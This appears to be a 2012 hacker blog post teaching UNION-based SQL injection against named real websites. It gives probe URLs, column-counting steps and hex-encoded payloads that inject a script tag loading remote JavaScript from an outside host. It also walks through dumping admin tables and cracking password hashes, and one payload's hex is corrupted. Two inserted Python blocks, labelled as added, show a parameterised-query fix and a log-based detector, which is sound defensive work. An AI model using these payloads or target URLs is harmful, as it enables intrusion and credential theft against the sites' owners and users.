Monday, March 12, 2012

Basic SQL TOOL Auto Injector v1.0 (Javascript)

Tool:
Requires an old version of Firefox ( >4 ), e.g. Firefox 3.6, or Safari.

Hacking Code:
----------------
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29

Method:
---------
Checking websites for the vulnerability
To check a website for the vulnerability, do the following:

http://www.targetdomain.com/index.php?id=4'

We can use the ' character, or the " character, to check for any vulnerability in the target website; this will show some error in the database connection.

Let's say we found a vulnerable site; then we can extract information from the database and gain some confidential data.

First.
-----
We need to find how many columns there are in the database.

http://www.targetdomain.com/index.php?id=4 order by 1--

We keep increasing the number until we get an error.

http://www.targetdomain.com/index.php?id=4 order by 5--
http://www.targetdomain.com/index.php?id=4 order by 10--

Second.
---------
We need to find the highest 'order by' number that does not produce the error. For this example, let's assume that I got an error at 'order by 11--', which means I then need to replace that 11 with a 10 again (which was the highest number I could put in without getting any errors). That is the number of columns in the database!

Third.
-------
So let's say there are 10 columns in the database. Now we need to find out which columns are vulnerable to SQL injection. We will use this query.

http://www.targetdomain.com/index.php?id=-4 union select 1,2,3,4,5,6,7,8,9,10--

Notice that I put a single - in front of the id number (id=-4).
Since there is no page with the id -4, it simply clears the site's text for us. That makes it easier for us to find the data that we are looking for.

Okay, let's say the numbers 3, 6 and 9 popped up on the site. These are the vulnerable columns. So we put this code in one of the vulnerable columns (I chose 3 for this example):

http://www.targetdomain.com/index.php?id=-4 union select all 1,2,
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c28f7363726970743e%29%29,4,5,6,7,8,9,10--
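
Why the three steps above get an answer from the server, and the server-side fix, shown as an added example that is not from the original post. It assumes a hypothetical three-column `news` table in an in-memory SQLite database and invented function names; the sites in the post run PHP on a different backend, but the string-concatenation flaw is the same.

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory table standing in for the page behind index.php?id=4.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (4, 'Launch', 'Product launch today')")
    return db

def fetch_vulnerable(db, raw_id):
    # "Before": the parameter is pasted into the SQL text, so whatever follows
    # the number is parsed as SQL (ORDER BY probes, UNION SELECT, comments).
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = " + raw_id).fetchall()

def fetch_hardened(db, raw_id):
    # "After": accept only a plain decimal id (defence in depth), then bind it
    # as a parameter so the value can never change the statement's structure.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a non-negative decimal integer")
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (int(raw_id),)).fetchall()

def outcome(fetch, raw_id):
    # What the visitor observes: rows, a database error (the signal the
    # ORDER BY step relies on), or a rejected request.
    db = make_db()
    try:
        return fetch(db, raw_id)
    except sqlite3.OperationalError:
        return "database error"
    except ValueError:
        return "rejected"

if __name__ == "__main__":
    for raw in ["4", "4 order by 3--", "4 order by 4--", "-4 union select 1,2,3--"]:
        print(f"{raw!r:28} vulnerable={outcome(fetch_vulnerable, raw)} "
              f"hardened={outcome(fetch_hardened, raw)}")
```

The reflected numbers only become a script-injection point because the page also prints database values without HTML-escaping them, so output encoding is the second fix alongside parameter binding.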

Example website:
--------------------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19--

Click the table for that website.
Not information_schema, okay :D!!
See the picture below :D




Now you can find the database for this website. To find the username and password, try clicking, for example, madhop_db.
You will find these tables:

   *  admin_user
   *  album
   *  banner
   *  category
   *  color_table
   *  countries
   *  currency_tbl
   *  download_detail
   *  download_list
   *  gallery_detail
   *  member
   *  news
   *  news_category
   *  order_detail
   *  order_list
   *  product
   *  product_photo
   *  province_tbl
   *  shop
   *  video
   *  video_category
   *  webboard_forum
   *  webboard_forumen
   *  webboard_topic
   *  webboard_topicen

Now we have some table information, and we need a little brainpower to find the right tables. :p

Example: admin_user, tblUser, tblAdmin, etc.

Click admin_user. Once we have found the actual table (username, password, etc.), click start.

Voilà, we have the admin login. You can find the password using the "read files" method.
Click "read files" at the top of this page and click load file.

You now have the username/password :D


If the data is encrypted we need to find an MD5 decrypter online. To find the admin we can use tools like Havij, admin page finder, etc.

EXAMPLE:
-----------
http://sju.ca/about/news.php?id=-80+union+select+all+1,2,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,4--

http://www.entp.edu.dz/actualite/news.php?id=-44%20union%20select%20all%201,2,3,4,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29--


http://www.calponycars.com/prodDetail.php?prodId=-349%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29--
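
For defenders, requests of the shape shown in this post leave a recognisable trail in web-server access logs. The following added example (not part of the original post) flags them in constructed log lines; the log format, paths, rule names and documentation IP addresses are assumptions, and the hex literal is a shortened constructed one that decodes to `<script>`.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (documentation IPs, hypothetical handlers).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2012:10:00:05 +0000] "GET /news.php?id=4%27 HTTP/1.1" 500 310
203.0.113.7 - - [12/Mar/2012:10:00:09 +0000] "GET /news.php?id=4+order+by+11-- HTTP/1.1" 500 310
203.0.113.7 - - [12/Mar/2012:10:00:15 +0000] "GET /news.php?id=-4+union+select+all+1,2,%28%280x3c7363726970743e%29%29,4-- HTTP/1.1" 200 980
198.51.100.2 - - [12/Mar/2012:10:01:00 +0000] "GET /search.php?q=order+by+price HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
ORDER_BY = re.compile(r"\border\s+by\s+\d+", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2}){4,})", re.I)

def decode_hex_literals(value):
    # Decode MySQL-style 0x... string literals so the hidden text can be inspected.
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(value)]

def classify(value):
    """Return the set of injection indicators in one decoded parameter value."""
    found = set()
    if value.rstrip().endswith(("'", '"')):
        found.add("quote-probe")
    if ORDER_BY.search(value):
        found.add("order-by-probe")
    if UNION_SELECT.search(value):
        found.add("union-select")
    if any("<script" in text.lower() for text in decode_hex_literals(value)):
        found.add("hex-encoded-script-tag")
    return found

def scan(log_text):
    """Return (client, path, sorted indicators) for each request that trips a rule."""
    hits = []
    for m in filter(None, map(REQUEST.match, log_text.splitlines())):
        client, target = m.groups()
        url = urlsplit(target)
        found = set()
        for _name, value in parse_qsl(url.query, keep_blank_values=True):
            found |= classify(value)
        if found:
            hits.append((client, url.path, sorted(found)))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The benign `q=order+by+price` search is not flagged because the rule requires a numeric column index, which keeps the false-positive rate down on sites with a search box.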

Credit by p4Ng5 H1t4m a.k.a 4p13h Mh-Cr3w
